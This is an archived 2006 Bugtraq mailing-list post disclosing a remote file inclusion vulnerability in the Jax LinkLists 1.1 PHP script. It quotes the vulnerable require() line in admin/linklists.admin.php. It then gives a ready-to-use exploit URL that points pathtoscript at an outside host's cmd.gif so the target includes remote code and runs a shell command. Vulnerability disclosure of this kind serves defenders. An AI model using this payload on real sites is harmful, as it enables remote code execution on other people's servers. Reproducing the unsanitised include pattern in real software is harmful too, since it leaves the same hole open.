Jax LinkLists Remote File include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Jax LinkLists Remote File include
From: dj_remix_20@xxxxxxxxxxx
Date: 13 Oct 2006 01:01:31 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# BiyoSecurity.Org & SecurityWall.Org

# Download : http://www.jtr.de/scripting/php/linklists/linklists%20v1.1.zip

# Script Name : Jax LinkLists

# Version : 1.1

# Risk : high

# Regard : RMx

# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :

/admin/linklists.admin.php

# Vulnerable code :

// global variables
require ( $pathtoscript."globals.inc.php");

# Exploit : 

http://www.victim.com/[PATH]/admin/linklists.admin.php?pathtoscript=http://site.com/cmd.gif?&cmd=ls

Prev by Date: pbpbb archive for search engines Remote File Include Vulnerability
Next by Date: MNews <= 2.0 (noticias.php) Remote File Inclue Vulnerability
Previous by thread: pbpbb archive for search engines Remote File Include Vulnerability
Next by thread: Re: Jax LinkLists Remote File include
Index(es):
- Date
- Thread